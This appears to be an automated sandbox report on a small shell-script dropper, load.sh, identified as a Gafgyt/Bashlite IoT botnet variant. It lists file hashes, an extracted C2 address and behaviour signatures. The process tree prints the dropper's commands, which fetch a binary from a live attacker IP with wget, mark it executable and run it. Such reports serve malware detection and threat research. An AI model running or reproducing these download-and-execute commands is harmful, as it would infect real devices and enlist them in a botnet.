Resubmissions

02/03/2025, 00:51

250302-a7g2dsysds 7

02/03/2025, 00:49

250302-a6r5zaymw2 10

02/03/2025, 00:48

250302-a5tx6syms4 3

01/03/2025, 11:30

250301-nmf59azrs3 10

Analysis

  • max time kernel
    1s
  • max time network
    2s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  • submitted
    02/03/2025, 00:49

General

  • Target

    load.sh

  • Size

    129B

  • MD5

    b165b7f155810af7139dd707d2e151c9

  • SHA1

    a49fe736dd310d0a64f3628c744c590fd7c43bdc

  • SHA256

    d21adb4e0938c18241d225748676e9f73c5a81210be881841b3b22c6e6abe9b4

  • SHA512

    8256ac2815b643527aae2410fa26a4179c22b793d028b402b2077fd57031e48f2457f6a07a6a0f53e479a3781ac466f248e58114dd38e35793ac3364e07a177c

Malware Config

Extracted

Family

gafgyt

C2

23.157.176.170:4258

Signatures

  • Detected Gafgyt variant 1 IoCs
  • Gafgyt family
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/load.sh
    /tmp/load.sh
    • Executes dropped EXE
    PID:639
    • /usr/bin/wget
      wget -q http://23.157.176.170/bin.x86_64 -O /tmp/bin.x86_64
      • Writes file to tmp directory
      PID:641
    • /bin/chmod
      chmod +x /tmp/bin.x86_64
      • File and Directory Permissions Modification
      PID:658
  • /tmp/bin.x86_64
    /tmp/bin.x86_64
    PID:660

Downloads

  • /tmp/bin.x86_64

    Filesize

    1.2MB

    MD5

    4a3c1c3b93e23346db61e05d48b6851b

    SHA1

    1aa8f6002d26188006fb6e2f844464d9cfcf225a

    SHA256

    d42209da7d4a2af37c7bb2e0bdeab6b30d7b1bfe4a0ef8e47cfba8140eb1ba34

    SHA512

    ae669cd0418ab4cdf00ac07ea3fd03b2ef9b6d37a3a201004bbdab0fdb33082024097e81e1cd245a6f3290b2b67c127e1316e59a24f6918211fd15c5d2c54add